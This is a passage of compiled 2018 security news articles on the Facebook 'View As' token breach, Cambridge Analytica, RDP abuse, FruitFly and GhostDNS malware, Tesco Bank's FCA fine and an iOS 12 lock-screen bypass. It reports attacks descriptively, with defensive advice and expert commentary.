In 2015 Facebook makes changes to its privacy policy and prevents third-party apps from accessing the data of users' friends without their consent.

The same year the social network discovers Kogan has passed on the information retrieved via his app to the British company Cambridge Analytica (CA), which specialises in the analysis of data and strategic communication.

In 2016 CA is hired by Donald Trump's US presidential campaign.

Facebook says it was assured by CA in 2015 that the data in question had been erased. But it estimates the firm could have had access to the data of up to 87 million users, most in the United States, without their consent, and mined this information to serve the Trump campaign.

Cambridge Analytica, which denies the accusations, has since filed for voluntary bankruptcy in the United States and Britain.

Facebook is accused of having been lax in its protection of user data, slow to intervene and consistently vague on its privacy settings.

In 2011 it signed a consent decree with US consumer protection agency the Federal Trade Commission (FTC) settling charges that it deceived consumers by telling them they could keep their information on Facebook private, and then allowing it to be shared and made public.

In March this year the FTC said it had opened an inquiry into Facebook's privacy practices, including whether the company violated the earlier agreement, which would incur hefty fines.

Beyond the CA scandal, Facebook estimates the data of nearly all its users may have, at some time, been retrieved without their knowledge.

- Political manipulation -

Facebook and sites like Google, Twitter and Tumblr are also accused of having allowed the spread through their networks of "fake news", including to manipulate public opinion ahead of the US election in favour of Trump.

The sites have acknowledged finding on their platforms messages, accounts and pages associated with the Internet Research Agency, a Saint Petersburg operation that is alleged to be a "troll farm" connected to the Russian government.

It is accused of spreading disinformation and propaganda including via postings -- often in the form of sponsored ads that target users based on their personal data -- that could influence opinion, for example over immigration.

According to Facebook, more than 120 million users had seen such content.

Facebook is in particular accused of not having been vigilant enough on monitoring the content and authenticity of pages and political ads that it carries.

It announced this year that it will require that the sponsors of political ads are identified and verified.

Earlier this month, Zuckerberg said Facebook was better prepared to defend against efforts to manipulate the platform to influence elections.

"We've identified and removed fake accounts ahead of elections in France, Germany, Alabama, Mexico and Brazil," Zuckerberg said.

"We've found and taken down foreign influence campaigns from Russia and Iran attempting to interfere in the US, UK, Middle East, and elsewhere -- as well as groups in Mexico and Brazil that have been active in their own country."


RDP Increasingly Abused in Attacks: FBI
2.10.2018 securityweek
Attack

Cyberattacks leveraging the remote desktop protocol (RDP) have been on the rise for the past couple of years, fueled by the emergence of dark markets selling RDP access, the Federal Bureau of Investigation (FBI) warns.

Malicious actors have created new methods of identifying and exploiting vulnerable RDP sessions over the web and both businesses and private users should take steps to reduce the likelihood of compromise, a joint alert from the FBI and Department of Homeland Security (DHS) reads.

RDP provides users with the ability to control a remote machine over the Internet. While authentication with a username and password are required to establish a remote desktop connection, attackers can infiltrate such connections and inject malware onto the remote system.

Assaults that abuse RDP do not require user input and the intrusion is difficult to detect. By abusing RDP sessions, malicious actors can compromise identities, steal login credentials, and ransom other sensitive information, the alert reads.

To perform RDP attacks, hackers target weak passwords (those which contain dictionary words or do not include a mixture of uppercase/lowercase letters, numbers, and special characters) and flaws in outdated versions of RDP, but also abuse unrestricted access to the default RDP port (TCP 3389) and unlimited login attempts to a user account.

Some of the threats known to abuse RDP include the CrySIS ransomware (primarily targeting US businesses, it demands a payment in Bitcoin in exchange for a decryption key), CryptON ransomware (which allows actors to manually execute malicious programs on the compromised machine), and Samsam ransomware (which is estimated to have generated over $6 million in revenue to its operator).

“Threat actors buy and sell stolen RDP login credentials on the Dark Web. The value of credentials is determined by the location of the compromised machine, software utilized in the session, and any additional attributes that increase the usability of the stolen resources,” the FBI alert reads.

Because the use of RDP creates risk, given the ability to remotely control a system entirely, the FBI and DHS recommend closely regulating, monitoring, and controlling usage. This includes auditing networks for systems using RDP and disabling the service where it is not needed.

Businesses should also verify that cloud-based virtual machine instances with a public IP do not have open RDP ports unless needed, and should place systems with an open RDP port behind a firewall. Furthermore, they should require the use a Virtual Private Network (VPN) for RDP access.

The use of strong passwords and account lockout policies should help defend against brute-force attacks, the same as two-factor authentication. Keeping systems and software updated should eliminate vulnerabilities, while a good back-up strategy ensures that systems can be easily restored in case of an attack.

Organizations should also enable logging to capture RDP logins, adhere to the cloud provider's best practices for remote access when creating cloud-based virtual machines, and require third parties follow internal policies on remote access.

The FBI and DHS also recommend businesses to minimize network exposure for all control system devices and remove RDP from critical devices where possible, as well as to regulate and limit external to internal RDP connections.


Industry Reactions to Facebook Hack
2.10.2018 securityweek
Social

Industry reactions to Facebook hackingFacebook revealed last week that malicious actors may have obtained access tokens for 50 million accounts after exploiting several bugs related to the “View As” feature and a video uploader introduced last year.

The breach was discovered last week following an investigation triggered by a traffic spike observed on September 16. Facebook says it has patched the vulnerability and there is no evidence that the compromised access tokens have been misused.

The incident, the latest in a series of security and privacy scandals involving the social media giant, could have serious repercussions for Facebook. The company’s stock went down, and it faces probes by government authorities, class action lawsuits, and a fine that could exceed $1.6 billion.

Industry professionals have commented on various aspects of the incident, including GDPR implications, the impact on Facebook and its users, the vulnerabilities exploited by the attackers, and the company’s response.

And the feedback begins...

Jeannie Warner, security manager, WhiteHat Security:

“What the hackers accessed is interesting to me– information about the accounts having to do with user data rather than financial. This really underscores the new value currency of privacy and personally identifiable information, which includes demographics like gender, hometown, name, age (birthdate) and anything else a person has under their ‘About’ tab. After the misuse of personal information by Cambridge Analytica, one starts to speculate that the same information is being harvested for similar militant bot and troll activity online, especially heading toward elections and other significant activities. Sometimes why hackers go in and what is taken can give clues as to who the hackers might be – in this case, I can speculate at a probable nation state or other political group data harvesting operation.

How it was detected is also interesting – user logins increased dramatically last December. Companies looking to assemble evidence of attack or compromise can look at user behavior and traffic patterns changing as evidence of ‘something different’ that requires investigation. The OWASP Top 10 Risks for Web Application Security Risks was updated a month before the traffic pattern was noticed last December 2017, adding a new item: A10 Insufficient Logging and Monitoring. This attack and the length of time it went undetected and verified represents the truth of that rating and inclusion as a major risk.”

Rahul Kashyap, CEO, Awake Security:

“The immediate challenge for Facebook is going to be identifying what accounts were touched, compared to which ones were truly compromised. The 50 million number could change as we often have seen with past breaches. But it is quite likely a subset of those were specifically taken over.

What will be revealing is whether there is a pattern to whose accounts were being targeted, and whether that pattern will help reveal the identity of the attackers. Facebook knows what it knows now, but it there’s always the possibility that attackers were able to get to more information. The large numbers in this breach could just be a decoy if threat actors were targeting specific individuals.”

Eric Sheridan, chief scientist, WhiteHat Security:

“One of the best proactive strategies in reducing the risk of introducing vulnerabilities in applications is the enumeration and systemic adoption of ‘secure design patterns.’ While they may be unique to each organization and perhaps each application, secure design patterns help solidify those code level patterns that developers must adhere to in order to ward off the introduction of exploitable vulnerabilities.

Facebook looks to have been exploited as a result of a Direct Object Reference, whereby an attacker could modify an ‘id’ parameter in order to access unauthorized user information. In this case, a secure design pattern dictating the use of a façade known to enforce data layer security constraints could be adopted to mitigate such vulnerabilities. The adoption of a secure design pattern is not enough, however. We need automation to help enforce the use of the secure design pattern at scale, which presents its own set of challenges.”

Dan Pitman, Principal Security Architect, Alert Logic:

“New features increase the risk that vulnerabilities like this can become part of the live application and Facebook are known to implement new features at a high rate, having been acknowledged as the leader in agile web development practices in the past.

This 'continuous delivery' of new features combined with the modular nature of that delivery increases risk that vulnerabilities like this can become part of the live application. Testing all of the myriad combinations of the sometimes hundreds of components, or modules, that can interact is the challenge. The applications are made up of components built by different developers at different times working based on older best practices, all of this means that vulnerabilities are an inevitability. In Facebook’s case there will be people working hard to identify flaws in both trenches and this time the attackers got there first.”

Matthew Maglieri, CISO, Ashley Madison:

“These types of incidents serve as a reminder that no organization is immune to cyber threats. Facebook is at the forefront of web application security and have an incredibly talented team dedicated to protecting the security and privacy of their users.

As a professional who has worked with companies around the world to enhance and build their cybersecurity programs, I would say that we need to learn from incidents like these and not rush to judge companies like Facebook.

And while we must hold each other accountable for these incidents, we also need to help each other up, to avoid belittling our peers who have gone through the worst, and to share what we know so that others can improve. If we don’t, we’ll only be preventing the open and honest dialogue necessary for our collective success.”

Pravin Kothari, CEO, CipherCloud:

“The real $50 million dollar question is who did this impact, exactly? Do any of those 50 million customers impacted reside in the European Community? If so, will this fall under GDPR and how will it be treated? Enforcement of GDPR will come from the Information Commissioner’s Office (ICO). What will their reaction be? Given the horrendous publicity from the Cambridge Analytica data exposures, the EU reaction is not easily predicted. Not knowing all of the detail of when the breach was discovered, who, exactly was impacted, who was responsible, etc., the possible outcomes may be worse than we know today. We’ll have to see what Facebook discloses about potential liability if any exists. The calculations of the potential fines under GDPR are a bit mind-boggling with any possible impact to millions of users.”

Dr. Richard Ford, Chief Scientist, Forcepoint:

“First, I think it’s great that Facebook appears to have reacted so quickly, as it’s a sign of the growing maturity around breach response that we’re starting to see as GDPR comes into effect. Understanding if there was a pattern to the impacted accounts versus just random selection is the difference between someone trying to hack the system for fun or a coordinated nation-state attack that compromises specific users to ultimately gain access to sensitive data.

This breach illustrates a fundamental truth of the new digital economy: when I share my personal data with a company I am putting my trust in your ability to protect that data adequately. Users need to continually evaluate the type of data they share and the potential impact a breach of that data could cause, to become an active participant in protecting their own online identities. On the other side, companies need to avail themselves of proactive technologies such as behavioral analysis to hold up their end of the bargain.”

Greg Foss, senior manager of Threat Research, LogRhythm:

“The view-as feature within Facebook’s platform, while well-intentioned, is difficult to implement programmatically, in that you are viewing your account as another individual – essentially a light version of account impersonation. When implemented properly, you’re given a specific view of an account based on what is programmatically known about the account you’re viewing from.

Based on information available, a video uploading feature implemented in July of last year exposed this feature to a flaw that allowed attackers to impersonate other user accounts and effectively obtain full access to their Facebook profiles. It appears that attackers are able to access the accounts of ‘friends’ or those already connected to the compromised account.

If that’s true, it may be possible to trace the attacks back to a single point of origin, given the nature of how the attack spreads to other accounts. That said, the origin account will most likely not be that of a real Facebook user, so determining an individual or group behind this will take some digging.”

Chester Wisniewski, Principal Research Scientist, Sophos:

“In something as big and complicated as Facebook, there are bound to be bugs. The theft of these authorization tokens is certainly a problem, but not nearly as big of a risk to user's privacy as other data breaches we have heard about or even Cambridge Analytica for that matter.

As with any social media platform, users should assume their information may be made public, through hacking or simply through accidental oversharing. This is why sensitive information should never be shared through these platforms. For now, logging out and back in is all that is necessary. The truly concerned should use this as a reminder and an opportunity to review all of their security and privacy settings on Facebook and all other social media platforms they share personal information with.”

Adam Levin, Founder, CyberScout:

“Facebook has had a hard year, and it just got worse. In a world dominated by trillion-dollar advertising platforms consisting of multi-billion member communities, 50 million users may no longer seem like a big deal, but it is. The number of people affected by this breach is roughly equal to the entire population of the west coast of the United States. Just because you are secure at 9:01 does not mean that will still be the case at 9:02. The latest Facebook breach was caused by an upgrade. The takeaway is simple: Any changes made to networks, software and other systems must be immediately and continually tested and monitored for vulnerabilities that may have been caused in the process. The traditional "patch and pray" approach to cybersecurity is obsolete. An effective vulnerability management program is crucial.”

Satya Gupta, chief technology officer and co-founder of Virsec:

“While the “View As” feature sounds like a useful way to see what your profile looks like to your ex-girlfriend, it was clearly built without thinking through security. Instead of just seeing through someone else’s eyes, Facebook essentially lets you borrow their identity. Armed with someone else’s access token you can get to lots of private and highly privileged information. In addition, millions of people use their Facebook ID (authenticated through their access tokens) to connect to other services where they might be storing files, making purchases, or doing other things that they thought were private. Facebook claims to not know what these 50 million access tokens are being used for, you can bet that the thieves have found them to be very valuable.

These problems could easily have been avoided and services that prioritize security, like banks, hospitals and even airlines rarely make these basic mistakes. It’s a bad idea to let users stay logged on indefinitely while there is no activity. Many people will open a Facebook browser tab and not close it for hours or days while doing other things. If you’re logged into your banking site and are inactive for more than a few minutes you are automatically logged off and need to re-authenticate. This is a small burden for users and a no-brainer for security. There are also solutions that provide continuous authentication requiring users to confirm their identity if there is any unusual behavior.”

Dawn Song, CEO, Oasis Labs:

“Today’s breach confirms a critical trend--it's nearly impossible for major tech companies to protect data with existing technologies. It's time to start looking at new solutions like blockchain to defend user privacy.”


Weak Passwords Abused for 'FruitFly' Mac Malware Distribution
2.10.2018 securityweek
Apple

FruitFly, a piece of Mac malware that infected thousands of machines over the course of more than 13 years, was being distributed via poorly protected external services.

First detailed in early 2017, FruitFly (also known as Quimitchin) targeted individuals, companies, schools, a police department, and the U.S. government, including a computer owned by a subsidiary of the Department of Energy.

In January this year, the U.S. Department of Justice indicted Phillip R. Durachinsky, an Ohio resident, for using the malware for more than 13 years for nefarious purposes. The man would abuse FruitFly to steal personal data of unknowing victims and spy on them, and even to produce child pornography.

Durachinsky allegedly leveraged the malware to control the infected machines “by accessing stored data, uploading files, taking and downloading screenshots, logging a user’s keystrokes, and turning on the camera and microphone to surreptitiously record images and audio,” the DoJ said in January.

While the threat’s capabilities were clear to the researchers who analyzed it, the only thing they couldn’t explain was the infection vector.

A newly discovered “flash alert” (PDF) that the Federal Bureau of Investigation (FBI) sent in March last year, however, solves the mystery: Durachinsky targeted poorly protected external services to install the malware onto his victims’ machines.

“The attack vector included the scanning and identification of externally facing Mac services to include the Apple Filing Protocol (AFP, port 548), RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches,” the alert reads.

Discovered by Patrick Wardle, co-founder and chief research officer of enterprise macOS security company Digita Security, the document reveals that, in addition to using the malware to spy on victims, Durachinsky was leveraging the infection to target additional systems.

Basically, he scanned the Internet for Macs with exposed ports that he could exploit and then attempted to connect to these systems using weak, known credentials. Once a system was compromised, he then attempted to persistently install the malware.

The targeting of poorly protected remote access protocols for malware installation isn’t a new technique. In fact, there are millions of endpoints exposing ports associated with the Remote Desktop Protocol (RDP) and this type of attack even surpassed spam in popularity among ransomware operators.


FCA fines Tesco Bank £16.4m over 2016 cyber attack
2.10.2018 securityaffairs
Attack

Tesco Bank agreed to pay £16.4m as part of a settlement with the Financial Conduct Authority following the 2016 security breach.
The Financial Conduct Authority (FCA) has assigned a £16.4m fine to Tesco Bank for the vulnerabilities in its systems that were exploited by hackers to steal millions of pounds from customers’ online accounts in 2016.

In November 2016, Tesco Bank halted all online transactions after a cyber heist affected thousands of its customers. An investigation is ongoing.

The measure was announced by the chief executive Benny Higgins, at the time the bank admitted that 40,000 of 136,000 current banking customers had their accounts hacked, and 50 percent of them have lost money.

According to the financial institution, hackers stole £2.26m from 9,000 customers accounts for over 48 hours. Most of the transactions were made in Brazil and relied on magnetic strip rules.

tesco

The bank was fined because it was not able to demonstrate “due skill, care and diligence” in protecting customers’ accounts from cyber attacks.

“The fine the FCA imposed on Tesco Bank today reflects the fact that the FCA has no tolerance for banks that fail to protect customers from foreseeable risks.” said Mark Steward, the executive director of enforcement and market oversight at the FCA.

“In this case, the attack was the subject of a very specific warning that Tesco Bank did not properly address until after the attack started. This was too little, too late. Customers should not have been exposed to the risk at all. Banks must ensure that their financial crime systems and the individuals who design and operate them work to substantially reduce the risk of such attacks occurring in the first place.”

“The standard is one of resilience, reducing the risk of a successful cyber-attack occurring in the first place, not only reacting to an attack.”

Tesco Bank was alerted by Visa one year before the cyber attack, but failed to apply the necessary countermeasures.

According to the FCA, Tesco Bank breached Principle 2 because it failed to exercise due skill, care and diligence to:

Design and distribute its debit card.
Configure specific authentication and fraud detection rules.
Take appropriate action to prevent the foreseeable risk of fraud.
Respond to the November 2016 cyber attack with sufficient rigour, skill and urgency.
According to the FCA, hackers used an algorithm to generate valid debit card numbers that were involved in fraudulent transactions.

Tesco Bank provided all the necessary support to the FCA and fully compensated customers, it was also able to halt a significant percentage of unauthorized transactions.

The efforts of the bank in limiting the exposure of its customers in post-incident were praised by the FCA granted the bank 30% credit for mitigation. Tesco Bank also agreed to an early settlement which qualified it for a 30% (Stage 1) discount under the FCA’s executive settlement procedure

“Tesco Bank provided a high level of cooperation to the FCA. Through a combination of this level of cooperation, its comprehensive redress programme which fully compensated customers, and in acknowledgment that it stopped a significant percentage of unauthorised transactions, the FCA granted the bank 30% credit for mitigation.” continues the FCA.

“In addition, Tesco Bank agreed to an early settlement of this matter which qualified for a 30% (Stage 1) discount under the FCA’s executive settlement procedure. But for the mitigation credit and the Stage 1 discount, the FCA would have imposed a penalty of £33,562,400.”


GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers
2.10.2018 securityaffairs
Virus

Security experts from Qihoo 360 NetLab spotted GhostDNS, a malware that already infected over 100K+ devices and targets 70+ different types of routers
Security experts from Qihoo 360 NetLab have uncovered an ongoing hacking campaign that leverages the GhostDNS malware. Attackers have already hijacked over 100,000 home routers, the malicious code allows to modify DNS settings to hijack the traffic and redirect users to phishing websites.

Between September 21 and 27, the GhostDNS campaign compromised more than 100,000 routers, most of them (87.8%) located in Brazil.

GhostDNS reminds us of the infamous DNSChanger malware that made the headlines for its ability to change DNS settings on the infected device

GhostDNS scans for the IP addresses used by routers that use weak or no password then accesses them and changes the DNS settings to a rogue DNS server operated by the attackers.

“Just like the regular dnschanger, this campaign attempts to guess the password on the router’s web authentication page or bypass the authentication through the dnscfg.cgi exploit, then changes the router’s default DNS address to the Rogue DNS Server[3]through the corresponding DNS configuration interface.” reads the analysis published by the experts.

“But this campaign has more, we have found three related DNSChanger programs, which we call Shell DNSChanger, Js DNSChanger and PyPhp DNSChanger according to their programming languages.”

GhostDNS

The GhostDNS has a modular structure composed of four components:

1) DNSChanger Module: The main module designed to exploit targeted routers, it has three sub-modules dubbed, Shell DNSChanger, Js DNSChanger, and PyPhp DNSChanger.

1.) Shell DNSChanger is written in the Shell programming language and combines 25 Shell scripts that allow the malware to carry out brute-force attacks on routers or firmware packages from 21 different manufacturers.
2.) Js DNSChanger is written in JavaScript and includes 10 attack scripts designed to infect 6 routers or firmware packages. It includes scanners, payload generators, and attack programs. The Js DNSChanger program is usually injected into phishing websites, so it works together with the Phishing Web System.
3.) PyPhp DNSChanger is written in Python and PHP, it contains 69 attack scripts designed to target 47 different routers/firmware. The component has been found deployed on over 100 servers, most of which on Google Cloud, it includes functionalities like Web API, Scanner and Attack module. Experts believe this sub-module is the core module of DNSChanger that allows attackers to scan the Internet to find vulnerable routers.
2) Web Admin module: Experts believe it implements an admin panel for attackers secured with a login page.

3) Rogue DNS module: The module resolves targeted domain names from the attacker-controlled web servers. At the time of the investigation, the expert had no access to the Rouge DNS server, for this reason, it was not possible to know the exact number DNS entries used to hijack legitimate domains.

4) Phishing Web module: The module implements phishing pages for the domains targeted in this campaign.

Attackers appear to be focused on Brazil where mainly targeted major banks.

“Currently the campaign mainly focuses on Brazil, we have counted 100k+ infected router IP addresses (87.8% located in Brazil), and 70+ router/firmware have been involved, and 50+ domain names such as some big banks in brazil , even Netflix, Citibank.br have been hijacked to steal the corresponding website login credentials,” continues the researchers.

Experts warn of the threat GhostDNS malware poses to Internet sue to its scalability and the availability of multiple attack vector.

Further details, including IoCs are reported in the analysis published by Qihoo 360 NetLab.


Several Bugs Exploited in Massive Facebook Hack
1.10.2018 securityaffairs
Social  Vulnerebility

Facebook Shares More Details on Hack Affecting 50 Million Accounts

Facebook Shares More Details About Hack Affecting 50 Million Accounts

Facebook has shared additional details about the hacker attack affecting 50 million accounts, including technical information and what its investigation has uncovered so far.

The social media giant announced on Friday that malicious actors exploited a vulnerability related to the “View As” feature to steal access tokens that could have been leveraged to hijack accounts. The tokens of nearly 50 million users have been compromised.

The tokens of these users have been reset to prevent abuse, along with the tokens of 40 million others who may be at risk due to the fact that they were subject to a View As lookup in the past year – impacted users will need to log back in to their accounts. The problematic feature has been suspended until a security review is conducted.

Technical details on Facebook hack

The “View As” feature shows users how others see their profile. This is a privacy feature designed to help users ensure that they only share information and content with the intended audience.

The vulnerability that exposed access tokens involved a combination of three distinct bugs affecting the “View As” feature and a version of Facebook’s video uploader interface introduced in July 2017.

When “View As” is used, the profile should be displayed as a read-only interface. However, the text box that allows people to wish happy birthday to their friends erroneously allowed users to post a video – this was the first bug.

When posting a video in the affected box, the video uploader generated an access token that had the permissions of the Facebook mobile app – this was the second bug as the video uploader should not have generated a token at this point.

The third and final problem was that the generated token was not for the user who had been using “View As” but for the individual whose profile was being looked up.

Hackers could obtain the token from the page’s HTML code, and use it access the targeted user’s account. An attacker would first have to target one of their friends’ account and move from there to other accounts. The attack did not require any user interaction.

“The attackers were then able to pivot from that access token to other accounts, performing the same actions and obtaining further access tokens,” explained Pedro Canahuati, VP of Engineering, Security and Privacy at Facebook.

Users and information affected by the breach

Facebook says the vulnerability has been patched. The social media giant claims that while the attackers did try to query its APIs to access profile information – such as name, gender and hometown – there is no evidence that any private information was actually accessed.

Facebook’s investigation continues, but the company says it has found no evidence that the attackers accessed private messages or credit card information.

Facebook says impacted users are from all around the world – it does not appear that the attack was aimed at a specific country or region. It’s worth noting that Facebook founder and CEO, Mark Zuckerberg, and Sheryl Sandberg, the company’s COO, were among those affected.

Another noteworthy issue is that the exposed tokens can be used not only to access Facebook accounts, but also third-party apps that use Facebook login. However, the risk should be eliminated now that the existing tokens have been reset.

Users who have linked Facebook to an Instagram account will need to unlink and relink their accounts due to the tokens being reset. Facebook clarified that WhatsApp is not impacted.

Facebook is alerting users whose tokens have been compromised by sending notifications to their accounts. In some cases, users can check if their accounts were actually hacked by accessing the “Security and Login” page from the Settings menu. However, access is only logged if the attacker created a full web session.

Incident timeline and information on attackers

Facebook discovered the breach following an investigation that started on September 16, after noticing a traffic spike, specifically increased user access to the website. However, it only realized that it was dealing with an attack on September 25, when it also identified the vulnerability. Affected users were notified and had their access tokens reset beginning with Thursday, September 27.

As for the attackers, no information has been shared, but the social media firm did note that exploitation of the vulnerability is complex and it did require a certain skill level.

The company says it has notified the FBI and law enforcement. While the company has responded quickly after the breach was discovered, MarketWatch reports that the Data Protection Commission in Ireland, Facebook's main privacy regulator in Europe, could fine the company as much as $1.64 billion under the recently introduced GDPR.

U.S. Senator Mark R. Warner responded to news of the Facebook hack, asking for a full investigation.

“Today’s disclosure is a reminder about the dangers posed when a small number of companies like Facebook or the credit bureau Equifax are able to accumulate so much personal data about individual Americans without adequate security measures,” Sen. Warner said. “This is another sobering indicator that Congress needs to step up and take action to protect the privacy and security of social media users. As I’ve said before – the era of the Wild West in social media is over.”

FTC Commissioner Rohit Chopra wrote on Twitter that he wants answers.

Despite no evidence of harm to any user, a class action lawsuit has already been filed against Facebook in the United States.

Facebook stock fell 3 percent after the breach was disclosed.


Expert demonstrated how to access contacts and photos from a locked iPhone XS
1.10.2018 securityaffairs
Apple

Expert discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could be exploited to access photos, contacts on a locked iPhone XS .
The Apple enthusiast and “office clerk” Jose Rodriguez has discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could be exploited by an attacker (with physical access to the iPhone) to access photos, contacts on a locked iPhone XS and other devices.
 

The hack works on the latest iOS 12 beta and iOS 12 operating systems, as demonstrated by Rodriguez in a couple of videos he published on YouTube (Videosdebarraquito).

The passcode bypass vulnerability affects a number of other iPhone models including the latest model iPhone XS.

An attacker can access the images on the devices by editing a contact and changing the image associated with a specific caller.

Apple has addressed the issue allowing images to be viewed via contacts, but Rodriguez devised a new method to circumvent the mitigations implemented by Apple.

The attack exploits the VoiceOver feature that enables accessibility features on iPhone, for this reason, the vulnerable device needs to have Siri enabled and Face ID either turned off or physically covered.

A step by step guide for the Rodriguez’s attack was published by the website Gadget Hacks.

iPhone passcode bypass issues are not uncommon, in September 2015, Jose Rodriguez discovered that the iOS 9.0.1 Update failed to address a lock screen bypass vulnerability.

In November 2017, experts discovered a flaw in iOS 8 and newer versions of the Apple OS that allowed bypassing the iPhone Passcode protection, even when Touch ID was properly configured, and access photos and messages stored on the device.


Estonia sues Gemalto for 152M euros over flaws in citizen ID cards issued by the company
1.10.2018 securityaffairs
CyberSpy

Estonian sues Gemalto for 152 million euros following the security flaws in the citizen ID cards issued by the company th